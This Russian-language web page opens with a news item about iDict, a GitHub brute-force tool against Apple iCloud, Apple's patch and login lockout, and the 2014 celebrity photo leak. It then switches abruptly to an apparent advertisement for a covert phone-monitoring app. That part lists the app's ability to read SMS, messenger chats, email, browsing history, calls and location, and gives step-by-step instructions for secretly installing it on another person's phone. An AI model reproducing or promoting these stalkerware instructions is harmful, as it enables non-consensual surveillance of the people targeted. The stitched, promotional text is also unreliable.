Закрыта уязвимость сервиса Apple iCloud

2f626dd015859eec77f917f33ce84348 Информационное издание Business Insider опубликовало новость об инструменте iDict, который появился на портале GitHub ещё в начале января. Как утверждают разработчики этого инструментария, программа позволяла легко эксплуатировать очевидную брешь, существовавшую в сервисе Apple iCloud.

Брутфорс-атака предполагает обычный перебор самых частых паролей, однако в этот раз воспользоваться ею практически никто не успел. Существовавшая примерно месяц уязвимость позволяла обходить все защитные барьеры, такие как ответы на контрольные вопросы, скрытые слова, и даже двухфакторная аутентификация.

Как описывал приложение его создатель, во многом целью и была мотивация разработчиков из Apple, дабы те сделали сервис более надёжным и безопасным. Ответ американской корпорации не заставил себя долго ждать, уже спустя несколько дней была выпущена заплатка для iCloud. После этого iDict перестал работать. Системы безопасности Apple традиционно считаются достаточно сложными для взлома, но периодически ошибки обнаруживаются в самом программном коде. Это приводит к появлению энтузиастов, которые начинают использовать вскрытые бреши в личных целях.

Со второго января Apple реализовала временную блокировку доступа к учётной записи пользователя, если после пятикратного ввода пароль оказывается неверным. Отныне банальная брутфорс-атака не имеет смысла, поскольку требует выжидать определённое количество времени после каждого пятого ввода. Поэтому перебор даже самых известных паролей занимает массу времени.

В прошлом году корпорация Apple уже была в центре скандала, связанного с их сервисом iCloud. Через него в Интернет попали многочисленные фотографии знаменитостей, в том числе и эротического содержания. Злоумышленники произвели взлом аккаунтов, сумев обойти все меры безопасности. Одной из причин называют слабые контрольные вопросы, указываемые знаменитостями. Чтобы найти на них ответы, достаточно было воспользоваться поисковой системой.

Скандал получился настолько серьёзным, что первое же заявление от Тима Кука, главы корпорации, было сделано спустя несколько дней. Специалист пообещал оперативно улучшить работу сервиса, но напомнил и о том, что iCloud не предназначался для хранения информации повышенной важности изначально.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.